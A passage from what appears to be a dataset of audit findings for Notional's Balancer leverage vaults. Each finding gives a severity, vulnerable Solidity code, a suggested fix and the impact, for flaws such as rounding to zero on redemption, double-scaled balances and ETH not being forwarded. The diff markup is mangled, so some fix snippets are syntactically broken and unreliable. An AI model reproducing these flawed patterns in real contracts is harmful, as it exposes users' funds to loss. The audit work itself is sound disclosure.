value is 
returned by the `_redeem` function. Thus, it will consider the small number of `strategyTokens` to be redeemed. Note that the `_redeemFromNotional` function calls the `_redeem` function under the hood.\\n```\\nFile: BaseStrategyVault.sol\\n function redeemFromNotional(\\n address account,\\n address receiver,\\n uint256 strategyTokens,\\n uint256 maturity,\\n uint256 underlyingToRepayDebt,\\n bytes calldata data\\n ) external onlyNotional returns (uint256 transferToReceiver) {\\n uint256 borrowedCurrencyAmount = _redeemFromNotional(account, strategyTokens, maturity, data);\\n\\n uint256 transferToNotional;\\n if (account == address(this) || borrowedCurrencyAmount <= underlyingToRepayDebt) {\\n // It may be the case that insufficient tokens were redeemed to repay the debt. If this\\n // happens the Notional will attempt to recover the shortfall from the account directly.\\n // This can happen if an account wants to reduce their leverage by paying off debt but\\n // does not want to sell strategy tokens to do so.\\n // The other situation would be that the vault is calling redemption to deleverage or\\n // settle. 
In that case all tokens go back to Notional.\\n transferToNotional = borrowedCurrencyAmount;\\n } else {\\n transferToNotional = underlyingToRepayDebt;\\n unchecked { transferToReceiver = borrowedCurrencyAmount - underlyingToRepayDebt; }\\n }\\n\\n if (_UNDERLYING_IS_ETH) {\\n if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n } else {\\n if (transferToReceiver > 0) _UNDERLYING_TOKEN.checkTransfer(receiver, transferToReceiver);\\n if (transferToNotional > 0) _UNDERLYING_TOKEN.checkTransfer(address(NOTIONAL), transferToNotional);\\n }\\n }\\n```\\n\\nSubsequently, on Notional side, it will deduct the redeemed strategy tokens from itsvaultState.totalStrategyTokens state (Refer to Line 177 below)\\n```\\nFile: VaultAction.sol\\n /// @notice Redeems strategy tokens to cash\\n function _redeemStrategyTokensToCashInternal(\\n VaultConfig memory vaultConfig,\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata vaultData\\n ) private nonReentrant returns (int256 assetCashRequiredToSettle, int256 underlyingCashRequiredToSettle) {\\n // If the vault allows further re-entrancy then set the status back to the default\\n if (vaultConfig.getFlag(VaultConfiguration.ALLOW_REENTRANCY)) {\\n reentrancyStatus = _NOT_ENTERED;\\n }\\n\\n VaultState memory vaultState = VaultStateLib.getVaultState(vaultConfig.vault, maturity);\\n (int256 assetCashReceived, uint256 underlyingToReceiver) = vaultConfig.redeemWithoutDebtRepayment(\\n vaultConfig.vault, strategyTokensToRedeem, maturity, vaultData\\n );\\n require(assetCashReceived > 0);\\n // Safety check to ensure that the vault does not somehow receive tokens in this scenario\\n require(underlyingToReceiver == 0);\\n\\n vaultState.totalAssetCash = vaultState.totalAssetCash.add(uint256(assetCashReceived));\\n vaultState.totalStrategyTokens = vaultState.totalStrategyTokens.sub(strategyTokensToRedeem);\\n 
vaultState.setVaultState(vaultConfig.vault);\\n\\n emit VaultRedeemStrategyToken(vaultConfig.vault, maturity, assetCashReceived, strategyTokensToRedeem);\\n return _getCashRequiredToSettle(vaultConfig, vaultState, maturity);\\n }\\n```\\n\\nHowever, the main issue is that when a small number of `strategyTokens` are redeemed and `bptClaim` is zero, the `_redeem` function will exit at Line 441 immediately. Thus, the redeemed strategy tokens are not deducted from the `strategyContext.vaultState.totalStrategyTokenGlobal` accounting variable on the Vault side.\\nThus, `strategyContext.vaultState.totalStrategyTokenGlobal` on the Vault side will not be in sync with the `vaultState.totalStrategyTokens` on the Notional side.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\nчThe number of strategy tokens redeemed needs to be deducted from the vault's `totalStrategyTokenGlobal` regardless of the `bptClaim` value. Otherwise, the vault's `totalStrategyTokenGlobal` will not be in sync.\\nWhen `bptClaim` is zero, it does not always mean that no strategy token has been redeemed. 
Based on the current vault implementation, the `bptClaim` might be zero because the number of strategy tokens to be redeemed is too small and thus it causes Solidity to round down to zero.\\n```\\nfunction _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n// Add the line below\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n// Add the line below\\n strategyContext.vaultState.setStrategyVaultState();\\n// Add the line below\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld // Remove the line below\\n= bptClaim;\\n// Remove the line below\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\nчThe `strategyContext.vaultState.totalStrategyTokenGlobal` variable that tracks the number of strategy tokens held in the vault will not be in sync and will cause accounting issues within the vault. This means that the actual total strategy tokens in circulation and the `strategyContext.vaultState.totalStrategyTokenGlobal` will be different. 
The longer the issue is left unfixed, the larger the differences between them.\\nThe `strategyContext.vaultState.totalStrategyTokenGlobal` will be larger than expected because it does not deduct the number of strategy tokens when it should be under certain conditions.\\nOne example of the impact is as follows: The affected variable is used within the `_convertStrategyTokensToBPTClaim` and `_convertBPTClaimToStrategyTokens`, `_getBPTHeldInMaturity` functions. These functions are used within the deposit and redeem functions of the vault. Therefore, the number of strategy tokens or assets the users receive will not be accurate and might be less or more than expected.ч```\\nFile: StrategyUtils.sol\\n /// @notice Converts strategy tokens to BPT\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n -Token amounts are scaled up twice causing the amounts to be inflated in two token vaultчhighчToken amounts are scaled up twice causing the amounts to be inflated in two token vault when performing computation. This in turn causes the reinvest function to break leading to a loss of assets for vault users, and the value of their strategy tokens will be struck and will not appreciate.\\nIn Line 121-124, the `primaryAmount` and `secondaryAmount` are scaled up to `BALANCER_PRECISION` (1e18). 
The reason for doing so is that balancer math functions expect all amounts to be in `BALANCER_PRECISION` (1e18).\\nThen, the scaled `primaryAmount` and `secondaryAmount` are passed into the `_getSpotPrice` function at Line 126.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n```\\n\\nWithin the `_getSpotPrice` function, the `primaryBalance` and `secondaryBalance` are scaled up again at Line 25 - 28. As such, any token (e.g. USDC) with a decimal of less than `BALANCER_PRECISION` (1e18) will be scaled up twice. 
This will cause the `balanceX` or `balanceY` to be inflated.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX,\\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n\\nBalancer's Scaling Factors\\nIt is important to know the underlying mechanism of scaling factors within Balancer to understand this issue.\\nWithin Balancer, all stable math calculations within the Balancer's pools are performed in 1e18. 
Thus, before passing the token balances to the stable math functions, all the balances need to be normalized to 18 decimals.\\nFor instance, assume that 100 USDC needs to be passed into the stable math functions for some computation. 100 USDC is equal to `100e6` since the decimals of USDC is `6`. To normalize it to 18 decimals, 100 USDC (100e6) will be multiplied by its scaling factor (1e12), and the result will be `100e18`.\\nThe following code taken from Balancer shows that the scaling factor is comprised of the scaling factor multiplied by the token rate. The scaling factor is the value needed to normalize the token balance to 18 decimals.\\n```\\n /**\\n * @dev Overrides scaling factor getter to introduce the tokens' price rate.\\n * Note that it may update the price rate cache if necessary.\\n */\\n function _scalingFactors() internal view virtual override returns (uint256[] memory scalingFactors) {\\n // There is no need to check the arrays length since both are based on `_getTotalTokens`\\n // Given there is no generic direction for this rounding, it simply follows the same strategy as the BasePool.\\n scalingFactors = super._scalingFactors();\\n scalingFactors[0] = scalingFactors[0].mulDown(_priceRate(_token0));\\n scalingFactors[1] = scalingFactors[1].mulDown(_priceRate(_token1));\\n }\\n```\\n\\nAnother point to note is that Balancer's stable math functions perform calculations in fixed point format. Therefore, the scaling factor will consist of the `FixedPoint.ONE` (1e18) multiplied by the value needed to normalize the token balance to 18 decimals. 
If it is a USDC with 6 decimals, the scaling factor will be 1e30:\\n```\\nFixedPoint.ONE * 10**decimalsDifference\\n1e18 * 1e12 = 1e30\\n```\\n\\n```\\n /**\\n * @dev Returns a scaling factor that, when multiplied to a token amount for `token`, normalizes its balance as if\\n * it had 18 decimals.\\n */\\n function _computeScalingFactor(IERC20 token) internal view returns (uint256) {\\n // Tokens that don't implement the `decimals` method are not supported.\\n uint256 tokenDecimals = ERC20(address(token)).decimals();\\n\\n // Tokens with more than 18 decimals are not supported.\\n uint256 decimalsDifference = Math.sub(18, tokenDecimals);\\n return FixedPoint.ONE * 10**decimalsDifference;\\n }\\n```\\n\\nProof-of-Concept\\nAssume that one of the tokens in Notional's two token leverage vault has a decimal of less than 18. Let's take USDC as an example.\\n100 USDC (1e6) is passed into the `_validateSpotPriceAndPairPrice` function as the `primaryAmount`. In Line 121-124 of the `_validateSpotPriceAndPairPrice` function, the `primaryAmount` will be scaled up to `BALANCER_PRECISION` (1e18).\\n`primaryAmount` = `primaryAmount` * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n`primaryAmount` = 100e6 * 1e18 / 1e6\\n`primaryAmount` = 100e18\\nWithin the `_getSpotPrice` function, the `primaryBalance` is scaled up again at Line 25 - 28 of the `_getSpotPrice` function.\\n`scaledPrimaryBalance = `primaryBalance` * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\nscaledPrimaryBalance = 100e18 * 1e30 / 1e18\\nscaledPrimaryBalance = 1e30\\nscaledPrimaryBalance = 1000000000000e18`\\nAs shown above, normalized 100 USDC (100e18) ended up becoming normalized 1000000000000 USDC (1000000000000e18). 
Therefore, the stable math functions are computed with an inflated balance of 1000000000000 USDC instead of 100 USDC.чSince the token balances are already normalized to 18 decimals within the `_getSpotPrice` function, the code to normalize the token balances in the `_validateSpotPriceAndPairPrice` function can be removed.\\n```\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n// Remove the line below\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n// Remove the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n// Remove the line below\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n// Remove the line below\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check the calculated primary/secondary price against the oracle price\\n /// to make sure that we are joining the pool 
proportionally\\n _checkPriceLimit(strategyContext, oraclePrice, calculatedPairPrice);\\n }\\n```\\nчThe spot price computed by the `Stable2TokenOracleMath._getSpotPrice` function will deviate from the actual price because inflated balances were passed into it. The deviated spot price will then be passed to the `_checkPriceLimit` function to verify if the spot price has deviated from the oracle price. The check will fail and cause a revert. This will in turn cause the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function to revert.\\nTherefore, any function that relies on the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function will be affected. It was found that the `MetaStable2TokenAuraHelper.reinvestReward` relies on the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function. As such, reinvest feature of the vault will be broken and the vault will not be able to reinvest its rewards.\\nThis in turn led to a loss of assets for vault users, and the value of their strategy tokens will be struck and will not appreciate.ч```\\nFile: Stable2TokenOracleMath.sol\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n uint256 primaryPrecision = 10 
** poolContext.primaryDecimals;\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n```\\n -`msgValue` will not be populated if ETH is the secondary tokenчhighч`msgValue` will not be populated if ETH is the secondary token in the two token leverage vault, leading to a loss of assets as the ETH is not forwarded to the Balancer Pool during a trade.\\nBased on the source code of the two token pool leverage vault, it is possible to deploy a vault to support a Balancer pool with an arbitrary token as the primary token and ETH as the secondary token. The primary token is always the borrowing currency in the vault.\\nHowever, Line 60 of `TwoTokenPoolUtils._getPoolParams` function below assumes that if one of the two tokens is ETH in the pool, it will always be the primary token or borrowing currency, which is not always the case. 
If the ETH is set as the secondary token, the `msgValue` will not be populated.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Returns parameters for joining and exiting Balancer pools\\n function _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n ) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n\\n return PoolParams(assets, amounts, msgValue);\\n }\\n```\\n\\nAs a result, when the caller joins the Balancer pool, the `params.msgValue` will be empty, and no secondary token (ETH) will be forwarded to the Balancer pool. 
The ETH will remain stuck in the vault and the caller will receive much fewer BPT tokens in return.\\n```\\nFile: BalancerUtils.sol\\n /// @notice Joins a balancer pool using exact tokens in\\n function _joinPoolExactTokensIn(\\n PoolContext memory context,\\n PoolParams memory params,\\n uint256 minBPT\\n ) internal returns (uint256 bptAmount) {\\n bptAmount = IERC20(address(context.pool)).balanceOf(address(this));\\n Deployments.BALANCER_VAULT.joinPool{value: params.msgValue}(\\n context.poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n params.assets,\\n params.amounts,\\n abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n params.amounts,\\n minBPT // Apply minBPT to prevent front running\\n ),\\n false // Don't use internal balances\\n )\\n );\\n bptAmount =\\n IERC20(address(context.pool)).balanceOf(address(this)) -\\n bptAmount;\\n }\\n```\\nчConsider populating the `msgValue` if the secondary token is ETH.\\n```\\n/// @notice Returns parameters for joining and exiting Balancer pools\\nfunction _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n// Add the line below\\n if (isJoin && assets[context.secondaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n// Add the line below\\n msgValue = amounts[context.secondaryIndex];\\n// Add the line below\\n }\\n \\n return PoolParams(assets, amounts, 
msgValue);\\n}\\n```\\nчLoss of assets for the callers as ETH will remain stuck in the vault and not forwarded to the Balancer Pool. Since the secondary token (ETH) is not forwarded to the Balancer pool, the caller will receive much fewer BPT tokens in return when joining the pool.\\nThis issue affects the deposit and reinvest reward functions of the vault, which means that the depositor will receive fewer strategy tokens in return during depositing, and the vault will receive less BPT in return during reinvesting.ч```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Returns parameters for joining and exiting Balancer pools\\n function _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n ) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n\\n return PoolParams(assets, amounts, msgValue);\\n }\\n```\\n -`totalBPTSupply` will be excessively inflatedчhighчThe `totalBPTSupply` will be excessively inflated as `totalSupply` was used instead of `virtualSupply`. This might cause a boosted balancer leverage vault not to be emergency settled in a timely manner and holds too large of a share of the liquidity within the pool, thus having problems exiting its position.\\nBalancer's Boosted Pool uses Phantom BPT where all pool tokens are minted at the time of pool creation and are held by the pool itself. 
Therefore, `virtualSupply` should be used instead of `totalSupply` to determine the amount of BPT supply in circulation.\\nHowever, within the `Boosted3TokenAuraVault.getEmergencySettlementBPTAmount` function, the `totalBPTSupply` at Line 169 is derived from the `totalSupply` instead of the `virtualSupply`. As a result, `totalBPTSupply` will be excessively inflated (2**(111)).\\n```\\nFile: Boosted3TokenAuraVault.sol\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n });\\n }\\n```\\n\\nAs a result, the `emergencyBPTWithdrawThreshold` threshold will be extremely high. As such, the condition at Line 97 will always be evaluated as true and result in a revert.\\n```\\nFile: SettlementUtils.sol\\n function _getEmergencySettlementParams(\\n StrategyContext memory strategyContext,\\n uint256 maturity,\\n uint256 totalBPTSupply\\n ) internal view returns(uint256 bptToSettle) {\\n StrategyVaultSettings memory settings = strategyContext.vaultSettings;\\n StrategyVaultState memory state = strategyContext.vaultState;\\n\\n // Not in settlement window, check if BPT held is greater than maxBalancerPoolShare * total BPT supply\\n uint256 emergencyBPTWithdrawThreshold = settings._bptThreshold(totalBPTSupply);\\n\\n if (strategyContext.vaultState.totalBPTHeld <= emergencyBPTWithdrawThreshold)\\n revert Errors.InvalidEmergencySettlement();\\n```\\n\\n```\\nFile: BalancerVaultStorage.sol\\n function _bptThreshold(StrategyVaultSettings memory strategyVaultSettings, uint256 totalBPTSupply)\\n internal pure returns (uint256) {\\n return (totalBPTSupply * strategyVaultSettings.maxBalancerPoolShare) / BalancerConstants.VAULT_PERCENT_BASIS;\\n }\\n```\\nчUpdate the function to 
compute the `totalBPTSupply` from the virtual supply.\\n```\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n// Remove the line below\\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n// Add the line below\\n totalBPTSupply: context.poolContext._getVirtualSupply(context.oracleContext)\\n });\\n }\\n```\\nчAnyone (e.g. off-chain keeper or bot) that relies on the `SettlementUtils.getEmergencySettlementBPTAmount` to determine if an emergency settlement is needed would be affected. The caller will presume that since the function reverts, emergency settlement is not required and the BPT threshold is still within the healthy level. The caller will wrongly decided not to perform an emergency settlement on a vault that has already exceeded the BPT threshold.\\nIf a boosted balancer leverage vault is not emergency settled in a timely manner and holds too large of a share of the liquidity within the pool, it will have problems exiting its position.ч```\\nFile: Boosted3TokenAuraVault.sol\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n });\\n }\\n```\\n -Users redeem strategy tokens but receives no assets in returnчhighчDue to a rounding error in Solidity, it is possible that a user burns their strategy tokens, but receives no assets in return due to issues in the following functions:\\nStrategyUtils._convertStrategyTokensToBPTClaim\\nBoosted3TokenPoolUtils._redeem\\nTwoTokenPoolUtils._redeem\\nThis affects 
both the TwoToken and Boosted3Token vaults\\n```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n\\nWithin the `StrategyUtils._convertStrategyTokensToBPTClaim` function, it was observed that if the numerator is smaller than the denominator, the `bptClaim` will be zero.\\n```\\nFile: StrategyUtils.sol\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n\\nWhen the `bptClaim` is zero, the function returns zero instead of reverting. Therefore, it is possible that a user redeems (\"burns\") their strategy tokens, but receives no assets in return because the number of strategy tokens redeemed by the user is too small.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\nчConsider reverting if the assets (bptClaim) received is zero. 
This check has been implemented in many well-known vault designs as this is a commonly known issue (e.g. Solmate)\\n```\\nfunction _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n// Remove the line below\\n if (bptClaim == 0) return 0;\\n// Add the line below\\n require(bptClaim > 0, \"zero asset\")\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld // Remove the line below\\n= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\nчLoss of assets for the users as they burn their strategy tokens, but receive no assets in return.ч```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n -Scaling factor of the wrapped token is incorrectчhighчThe scaling factor of the wrapped token within the Boosted3Token leverage vault is incorrect. Thus, all the computations within the leverage vault will be incorrect. 
